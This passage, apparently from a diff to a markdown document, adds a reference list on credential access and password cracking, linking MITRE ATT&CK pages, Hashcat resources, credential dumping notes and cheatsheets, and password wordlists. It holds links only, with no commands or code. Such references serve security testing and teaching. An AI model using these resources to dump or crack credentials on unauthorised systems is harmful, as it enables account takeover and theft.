- MITRE ATT&CK TA0006 (Credential Access): https://attack.mitre.org/tactics/TA0006/
|
|
746
|
+
- MITRE T1003 (OS Credential Dumping): https://attack.mitre.org/techniques/T1003/
|
|
747
|
+
- Hashcat example hashes: https://hashcat.net/wiki/doku.php?id=example_hashes
|
|
748
|
+
- Hashcat rules collection: https://github.com/NotSoSecure/password_cracking_rules
|
|
749
|
+
- ired.team credential access notes: https://www.ired.team/offensive-security/credential-access-and-credential-dumping
|
|
750
|
+
- S3cur3Th1sSh1t credential dumping cheatsheet: https://github.com/S3cur3Th1sSh1t/Cheatsheet-God
|
|
751
|
+
|
|
752
|
+
### Wordlists and Rules
|
|
753
|
+
|
|
754
|
+
- SecLists passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords
|
|
755
|
+
- Probable-Wordlists: https://github.com/berzerk0/Probable-Wordlists
|
|
756
|
+
- OneRuleToRuleThemAll: https://github.com/NotSoSecure/password_cracking_rules
|